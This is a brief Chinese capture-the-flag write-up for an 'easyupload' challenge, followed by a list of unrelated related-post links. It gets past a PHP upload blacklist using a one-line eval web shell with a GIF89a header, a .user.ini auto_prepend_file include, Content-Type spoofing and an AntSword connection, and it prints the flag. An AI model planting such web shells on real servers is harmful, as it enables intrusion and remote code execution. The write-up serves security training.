CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
ヽ格式化10 小时前
一文读懂栈与堆:从生活例子到Golang/PHP内存管理实践
golang·php·生活
骥龙10 小时前
4.12、隐私保护机器学习:联邦学习在安全数据协作中的应用
人工智能·安全·网络安全
c***979811 小时前
PHP在内容管理中的模板引擎
开发语言·php
Q_Q51100828511 小时前
python+django/flask的情绪宣泄系统
spring boot·python·pycharm·django·flask·node.js·php
用户72278681234411 小时前
PHP Fiber 优雅协作式多任务
php
青茶36013 小时前
ThinkCMF是一个开源的内容管理框架
php·cms·thinkphp
vx_vxbs6614 小时前
【SSM电动车智能充电服务平台】(免费领源码+演示录像)|可做计算机毕设Java、Python、PHP、小程序APP、C#、爬虫大数据、单片机、文案
java·spring boot·mysql·spring cloud·小程序·php·idea
世界尽头与你14 小时前
Go pprof 调试信息泄露漏洞
安全·网络安全·golang·渗透测试
j***576814 小时前
电脑可以连接wifi,但是连接后仍然显示没有网络
网络·电脑·php
踢球的打工仔16 小时前
PHP面向对象(5)
android·java·php